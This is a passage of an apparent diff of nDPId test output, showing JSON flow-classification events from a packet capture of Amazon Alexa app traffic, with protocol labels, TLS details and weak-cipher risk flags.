G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 